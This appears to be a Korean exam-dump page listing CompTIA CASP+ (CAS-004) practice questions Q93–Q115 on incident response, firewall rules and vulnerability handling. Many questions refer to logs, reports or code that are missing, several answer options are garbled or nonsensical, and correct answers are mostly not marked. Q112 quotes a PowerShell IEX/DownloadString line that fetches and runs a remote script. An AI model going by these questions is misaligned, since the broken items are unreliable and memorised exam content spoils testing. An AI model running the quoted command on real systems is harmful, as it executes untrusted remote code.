CAS-004 실제 문제 답안 PDF 100% 커버 실제 시험 문제 [Q93-Q115]

2월 13, 20232월 13, 2023 examdumpsCAS-004 실제 문제 답안 PDF 100% 커버 실제 시험 문제 [Q93-Q115] 0 댓글

태그: CAS-004 시험지, CAS-004 최신 테스트 비용, CAS-004 연습 모의, CAS-004 신뢰할 수 있는 실제 시험 답안, CAS-004 유효한 테스트 pass4sure

이 게시물 평가하기

CAS-004 실제 문제 답안 PDF 100% 커버 실제 시험 문제

CAS-004 시험 질문과 답변

CompTIA CASP+ 시험 인증 세부 정보:

샘플 질문	CompTIA CASP+ 샘플 문제
시험 가격	$466 (USD)
시험 일정 예약	CompTIA 마켓플레이스 피어슨 뷰
기간	165분
도서 / 교육	CASP+ CAS-004
시험 이름	CompTIA 고급 보안 전문가(CASP+)
질문 수	90

Q93. 분석가가 인터넷에 연결된 DNS 서버에 대한 취약성 스캔을 실행하고 다음과 같은 보고서를 받습니다:

분석가가 가장 중요한 취약점을 검증하기 위해 가장 먼저 사용해야 하는 도구는 다음 중 어느 것입니까?

비밀번호 크래커

포트 스캐너

계정 열거자

익스플로잇 프레임워크

Q94. 보안 이벤트를 조사하던 중 분석가가 사용자가 알 수 없는 출처에서 보낸 이메일 첨부 파일을 열었다는 증거를 발견합니다. 사용자가 첨부 파일을 연 직후 서버 그룹에서 대량의 네트워크 및 리소스 활동이 발생했습니다. 서버를 조사한 분석가는 48시간 이내에 돈을 지불하지 않으면 모든 데이터가 파괴된다는 랜섬웨어에 의해 서버가 암호화된 것을 발견합니다. 회사에는 랜섬웨어에 대한 대응 계획이 없습니다.
다음 중 분석가가 관리 팀에 인시던트를 보고한 후 취해야 할 다음 단계는 무엇인가요?

48시간 이내에 몸값을 지불하세요.

서버를 격리하여 확산을 방지하세요.

법 집행 기관에 알립니다.

영향을 받은 서버를 즉시 복구하도록 요청하세요.

Q95. 잠재적 침해가 보고된 직후 보안 엔지니어는 조직 사고 대응 절차의 일환으로 해당 서버의 포렌식 이미지를 생성합니다. 이미지의 무결성을 보장하기 위해 다음 중 반드시 수행해야 하는 작업은 무엇인가요?

이미지는 변경되지 않도록 비밀번호로 보호해야 합니다.

이미지의 해시값을 계산해야 합니다.

이미지가 포함된 디스크는 고정된 용기에 넣어야 합니다.

이미지의 복제본을 유지해야 합니다.

Q96. 보안 아키텍트가 다음과 같은 기업 방화벽 아키텍처 및 구성 제안을 검토하고 있습니다:

두 방화벽 모두 상태 저장형이며 레이어 7 필터링 및 라우팅을 제공합니다. 회사에는 다음과 같은 요구 사항이 있습니다:
웹 서버는 회사 네트워크에서 HTTP/S를 통해 모든 업데이트를 수신해야 합니다.
웹 서버는 인터넷과의 통신을 시작해서는 안 됩니다.
웹 서버는 사전 승인된 회사 데이터베이스 서버에만 연결해야 합니다.
직원의 컴퓨팅 장치는 포트 80과 443을 통해서만 웹 서비스에 연결해야 합니다.
다음 중 가장 안전한 방식으로 모든 요구 사항을 충족하기 위해 설계자가 권장해야 하는 것은 무엇인가요? (두 가지를 선택하세요.)

Firewall_A에 다음 추가: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443

Firewall_A에 다음 추가: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443

Firewall_A에 다음 추가: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535

Firewall_B에 다음 추가: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535

Firewall_B에 다음 추가: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535

Firewall_B에 다음 추가: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443

Q97. 서비스를 제공하기 위해 여러 타사 조직을 사용하는 대형 은행의 최고 정보 책임자(CIO)는 당사자들의 고객 데이터 취급 및 보안에 대해 우려하고 있습니다. 다음 중 위험을 가장 잘 관리하기 위해 구현해야 하는 것은 무엇인가요?

공급업체의 중요성을 평가하고 계약 갱신에 따라 순위를 매기는 검토 위원회를 구성합니다. 계약 갱신 시 계약서에 설계 및 운영 통제와 감사 청구권 조항을 포함하세요. 전담 위험 관리 팀과 함께 공급업체의 계약 갱신 후를 정기적으로 평가합니다.

일선 리스크 팀, 사업부, 공급업체 경영진으로 구성된 팀을 구성하여 모든 공급업체의 설계 보안 통제만 평가합니다. 검토 결과를 데이터베이스에 저장하여 다른 모든 사업부와 리스크 팀이 참조할 수 있도록 합니다.

액세스하는 데이터, 데이터 액세스 방법, 데이터 유형에 관계없이 모든 공급업체를 정기적으로 검토하는 감사 프로그램을 구축하고, 모범 사례 표준에 따라 모든 설계 및 운영 통제를 검토하고 그 결과를 상위 경영진에게 보고합니다.

데이터 액세스, 데이터 유형, 데이터 액세스 방식에 따라 공급업체를 평가하는 거버넌스 프로그램을 수립합니다. 공급업체의 평가에 따라 검토 및 관리되는 주요 제어를 할당합니다. 공급업체와 다양한 위험 팀에 의존하는 부서를 찾아 보고합니다.

Q98. 조직은 재해 복구 및 운영 연속성을 계획하고 있습니다.
지침
다음 시나리오와 지침을 검토하세요. 각 관련 결과를 영향을 받은 호스트와 일치시킵니다.
시나리오 3을 적절한 호스트와 연결한 후 해당 호스트를 클릭하여 해당 발견 사항에 대한 적절한 수정 조치를 선택합니다.
각 검색 결과는 두 번 이상 사용할 수 있습니다.
언제든지 시뮬레이션의 초기 상태로 되돌리려면 모두 초기화 버튼을 클릭하세요.

Q99. 보안 분석가가 다음 취약성 평가 보고서를 검토하고 있습니다:

다음 중 인터넷 연결 호스트에 대한 공격을 최소화하기 위해 가장 먼저 패치해야 하는 것은 무엇인가요?

Server1

Server2

서버 3

서버

Q100. 한 회사에서 웹 서버가 경쟁사에 의해 침입당했을 가능성이 있다고 의심합니다. 보안 엔지니어가 웹 서버 로그를 검토한 결과 다음과 같은 사실을 발견했습니다:

보안 엔지니어는 개발자와 함께 코드를 살펴보고 다음 줄이 실행될 때 로그 항목이 생성되는지 확인합니다:

다음 중 회사가 구현해야 하는 적절한 보안 제어는 무엇인가요?

디렉터리 권한을 읽기 전용 액세스로 제한합니다.

서버 측 처리를 사용하여 경로 입력의 XSS 취약점을 방지하세요.

명령 주입을 방지하기 위해 시스템 호출에서 항목을 구분합니다.

SQL 인젝션을 방지하기 위해 경로 변수에 쿼리를 매개변수화합니다.

Q101. 회사 직원은 해외 출장 중 회사 시스템에 액세스할 수 없습니다. 회사 이메일 시스템은 지리적 위치에 따라 로그인을 차단하도록 구성되어 있지만 일부 직원이 여행 중에도 휴대폰으로 이메일이 계속 동기화된다고 보고합니다. 다음 중 가장 가능성이 높은 것은 무엇입니까? (2개를 선택하세요.)

오래된 에스컬레이션 공격

권한 상승 공격

모바일 장치에서의 VPN

무제한 이메일 관리자 계정

UDP 프로토콜의 주요 사용처

모바일 장치에서 GPS 비활성화

Q102. 한 회사가 사이버 보안 방어를 강화하기 위해 네트워크 인프라에 집중하고 있습니다. 이 솔루션은 오탐으로 인해 합법적인 트래픽이 차단되지 않도록 회사 서비스의 가용성에 영향을 미치지 않아야 합니다.
다음 중 요구 사항을 충족하는 것은 무엇인가요?

NIDS

NIPS

WAF

역방향 프록시

참조:
https://owasp.org/www-community/controls/Intrusion_Detection

Q103. 보안 분석가가 직원들이 보안팀에 보낸 일련의 의심스러운 이메일을 조사하고 있습니다. 이메일은 현재 비즈니스 파트너가 보낸 것으로 보이며 이미지나 URL이 포함되어 있지 않습니다. 회사에서 사용하는 보안 도구에 의해 메시지에서 이미지나 URL이 제거되지 않았으며, 이메일에는 일반 텍스트로만 다음과 같은 내용이 포함되어 있습니다.

보안 분석가는 다음 중 어떤 업무를 수행해야 하나요?

비즈니스 파트너의 보안 부서에 연락하여 이메일 이벤트에 대해 알립니다.

경계 방화벽에서 비즈니스 파트너의 IP 주소를 차단합니다.

제로데이 바이러스에 감염된 경우 해당 직원의 디바이스를 네트워크에서 분리하세요.

비즈니스 파트너가 발신한 모든 메시지를 자동으로 격리하도록 이메일 게이트웨이를 구성하세요.

Q104. 웹 애플리케이션에서 심각도가 높은 취약점이 발견되어 기업에 도입되었습니다. 이 취약점으로 인해 권한이 없는 사용자가 오픈 소스 라이브러리를 사용하여 권한이 있는 사용자 정보를 볼 수 있습니다. 기업은 위험을 감수하고 싶지 않지만 개발자가 문제를 즉시 해결할 수 없습니다.
다음 중 문제가 해결될 때까지 위험을 허용 가능한 수준으로 줄이려면 다음 중 어떤 조치를 취해야 하나요?

정적 코드 분석기로 코드를 스캔하고, 권한이 있는 사용자 비밀번호를 변경하고, 보안 교육을 제공하세요.

권한 있는 사용자 이름을 변경하고, OS 로그를 검토하고, 하드웨어 토큰을 배포하세요.

MFA를 구현하고, 애플리케이션 로그를 검토하고, WAF를 배포하세요.

VPN을 배포하고, 공식 오픈 소스 라이브러리 리포지토리를 구성하고, 취약점에 대한 전체 애플리케이션 검토를 수행하세요.

Q105. 회사의 SOC가 특정 취약점을 활용하는 활성 캠페인에 대한 위협 인텔리전스를 수신했습니다.
회사는 이 적극적인 캠페인에 취약한지 여부를 확인하고자 합니다.
다음 중 회사가 이 결정을 내릴 때 사용해야 하는 것은 무엇인가요?

위협 헌팅

시스템 침투 테스트

SIEM 도구 내 로그 분석

사이버 킬 체인

Q106. 감사자가 인시던트의 원인을 파악하기 위해 웹 애플리케이션의 로그를 검토하고 있습니다. 웹 애플리케이션 아키텍처 인터넷에 액세스할 수 있는 애플리케이션 로드 밸런서, 사설 서브넷의 여러 웹 서버, 애플리케이션 서버 및 데이터베이스 서버 1대를 계층형 구성으로 포함합니다. 애플리케이션 로드 밸런서는 로그를 저장할 수 없습니다. 다음은 샘플 로그 스니펫입니다:

감사인이 향후 사고의 원인을 추적할 수 있도록 하기 위해 다음 중 어떤 것을 권장해야 하나요?

로드 밸런서에서 x-Forwarded-For 헤더를 활성화합니다.

애플리케이션 서버에 소프트웨어 기반 HIDS를 설치합니다.

신뢰할 수 있는 CA가 서명한 인증서를 설치합니다.

데이터베이스 서버에서 저장 프로시저를 사용합니다.

웹 서버가 수신한 $_서버( ' REMOTE_ADDR ' ]의 값을 저장합니다.

Q107. 한 개발자가 회사를 위한 새로운 모바일 애플리케이션을 만들고 있습니다. 이 애플리케이션은 REST API와 TLS 1.2를 사용하여 외부 백엔드 서버와 안전하게 통신합니다. 이 구성으로 인해 회사는 HTTPS 가로채기 공격에 대해 우려하고 있습니다.
다음 중 이러한 유형의 공격에 가장 적합한 솔루션은 무엇인가요?

쿠키

와일드카드 인증서

HSTS

인증서 고정

Q108. 한 취약점 분석가가 회사에서 내부적으로 개발한 소프트웨어에서 제로데이 취약점을 발견했습니다. 현재 취약점 관리 시스템에는 이 취약점에 대한 점검 기능이 없기 때문에 엔지니어에게 취약점 관리 시스템을 만들어 달라는 요청을 받았습니다.
다음 중 이러한 요구 사항을 충족하는 데 가장 적합한 것은 무엇인가요?

ARF

ISAC

Node.js

OVAL

Q109. 다음 중 ICS에 출력할 전력량을 알려주는 제어 메시지에 암호화를 적용할 때 가장 중요한 보안 목표는 무엇입니까?

메시지 가용성 가져오기

메시지 부인 방지 보장

메시지에 대한 프로토콜 준수 적용

메시지의 무결성 보장

Q110. MDM 소프트웨어의 장치 이벤트 로그 소스는 다음과 같습니다:

다음 중 로그에서 디바이스가 제기하는 위험을 가장 잘 해결할 수 있는 보안 문제 및 대응 조치는 무엇인가요?

애플리케이션의 악의적인 설치, 애플리케이션 ID 1220을 제거하도록 MDM 구성을 변경합니다.

리소스 유출; 분석을 위해 장치를 복구하고 로컬 저장소를 정리합니다.

여행 불가능; 조사하는 동안 디바이스의 계정 및 액세스를 비활성화합니다.

위조된 상태 보고, 원격으로 디바이스를 초기화합니다.

Q111. 보안 분석가가 다음과 같은 활동을 보여주는 여러 SIEM 이벤트를 발견합니다:

다음 중 분석가가 가장 먼저 취해야 할 대응 조치는 무엇인가요?

모든 Microsoft Windows 엔드포인트에서 powershell.exe를 비활성화합니다.

Microsoft Windows Defender를 다시 시작합니다.

40.90.23.154를 차단하도록 정방향 프록시를 구성합니다.

엔드포인트에서 로컬 관리자 권한을 비활성화합니다.

Q112. 한 보안 분석가가 외부 메일 서버에 대한 로그인 시도 실패 횟수가 꾸준히 증가하는 것을 발견했습니다. 분석가는 점프 박스 중 하나를 조사하는 동안 로그 파일에서 다음과 같은 내용을 확인했습니다: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois
다음 중 다음 중 다음 단계의 공격을 경고하고 방지할 수 있는 보안 제어는 무엇인가요?

안티바이러스 및 UEBA

리버스 프록시 및 샌드박스

EDR 및 애플리케이션 승인 목록

전달 프록시 및 MFA

EDR과 화이트리스트는 이러한 공격으로부터 보호해야 합니다.

Q113. 한 회사가 해커가 인증 정보를 도용하여 반복적으로 보안 침해를 당하고 있습니다. 회사의 최고 정보 보안 책임자(CISO)는 생체 인식 및 토큰 기반 요소를 포함하여 사용자를 인증하기 위한 여러 가지 제어 기능을 설치했습니다. 각각의 제어 기능은 오버헤드와 복잡성을 증가시켰지만 추가 침해를 막는 데는 실패했습니다. 외부 컨설턴트가 인증 제어를 지원하기 위해 현재 시행 중인 프로세스를 평가하고 있습니다. 다음 중 무단 액세스의 위험을 가장 많이 줄일 수 있는 권장 사항은 무엇인가요?

엄격한 3단계 인증을 구현하세요.

최소 권한 정책 구현

일회성 또는 모든 사용자 인증으로 전환합니다.

신원 확인 절차 강화

Q114. 취약성 평가 엔드포인트에서 최신 결과에 대한 보고서를 생성했습니다. 보안 분석가는 보고서를 검토하고 해결해야 하는 항목의 우선순위 목록을 작성해야 합니다. 다음 중 분석가가 목록을 신속하게 작성하기 위해 사용해야 하는 것은 무엇인가요?

비즈니스 영향 평가

CVE 날짜

CVSS 점수

OVAL

Q115. 한 회사가 지적 재산을 도난으로부터 보호하고자 합니다. 이 회사는 이미 ACL과 DAC를 적용했습니다.
다음 중 회사가 데이터 도난을 방지하기 위해 사용해야 하는 것은 무엇인가요?

워터마킹

DRM